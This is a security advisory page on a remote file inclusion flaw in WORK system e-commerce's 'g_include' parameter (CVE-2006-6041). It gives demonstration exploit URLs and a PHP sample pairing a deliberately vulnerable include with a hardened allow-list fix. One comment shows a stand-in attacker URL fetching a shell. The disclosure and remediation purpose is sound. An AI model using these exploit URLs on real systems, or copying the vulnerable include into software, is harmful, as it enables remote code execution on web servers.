SecurityTracker.com
SecurityTracker
Archives

Category:   Application (Commerce)  >   WORK system e-commerce
Vendor:   worksystem.sourceforge.net
WORK system e-commerce Include File Bug in 'g_include' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017249
SecurityTracker URL:  http://securitytracker.com/id/1017249
CVE Reference:   CVE-2006-6041   (Links to External Site)
Updated:  Dec 14 2006
Original Entry Date:  Nov 17 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.0.1 and prior versions
Description:   A vulnerability was reported in WORK system e-commerce. A remote user can include and execute arbitrary code on the target system.

The software passes the user-supplied 'g_include' parameter to a PHP include without validating it. A remote user can supply a specially crafted URL to cause the target system to fetch and execute arbitrary PHP code from a remote location (a remote file inclusion). That code, including any operating system commands it invokes, runs with the privileges of the web server process. Remote inclusion of this kind depends on the PHP installation allowing URL wrappers in include (allow_url_fopen, or allow_url_include on PHP 5.2 and later); where that is disabled, an unvalidated include path remains a local file inclusion risk.

Other parameters may also be affected.

Some demonstration exploit URLs are provided:

http://[target]/work/index.php?g_include=[shell_script]
http://[target]/work/module/forum/forum.php?g_include=[shell_script]
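
The following is an added illustration for this advisory, not code from WORK system e-commerce: a hypothetical include pattern of the kind described above, placed beside a hardened replacement that maps the request value onto a fixed allow-list. The function names, module names and file paths are assumptions for the example.

```php
<?php
// Added example for this advisory; it is not WORK system code, and the
// function names, module names and paths are assumptions. It shows the
// include pattern the advisory describes next to a hardened replacement.

// VULNERABLE (hypothetical): the request value is passed straight to include.
// With register_globals on, ?g_include=... arrives as $g_include; when PHP
// allows URL wrappers in include (allow_url_fopen before 5.2, allow_url_include
// from 5.2), ?g_include=http://attacker.example/shell.txt is fetched and run
// with the web server's privileges.
function render_module_vulnerable($g_include)
{
    include $g_include;
}

// HARDENED: the request value is only a key into a fixed allow-list of files
// shipped with the application; request data never reaches include().
const MODULES = [
    'forum'   => __DIR__ . '/module/forum/forum.php',
    'catalog' => __DIR__ . '/module/catalog/catalog.php',
];

// Returns the module path for $name, or null when $name is not allow-listed.
function resolve_module(?string $name): ?string
{
    if ($name === null || !array_key_exists($name, MODULES)) {
        return null;
    }
    return MODULES[$name];
}

function render_module_hardened(array $get): void
{
    // g_include[]=x would arrive as an array; treat anything but a string as absent.
    $name = $get['g_include'] ?? null;
    $path = resolve_module(is_string($name) ? $name : null);
    if ($path === null || !is_file($path)) {
        http_response_code(400);
        echo 'unknown module';
        return;
    }
    include $path;
}

// Usage: render_module_hardened($_GET);
```

As defence in depth, pair the allow-list with allow_url_include = Off (and register_globals = Off) in php.ini, so that even a missed include site cannot pull code from a URL; the allow-list is still needed, because those settings do not stop inclusion of local files.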

SlimTim10 reported this vulnerability.

The original advisory is available at:

http://www.milw0rm.com/exploits/2752

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (3.0.4).
Vendor URL:  worksystem.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

Copyright 2021, SecurityGlobal.net LLC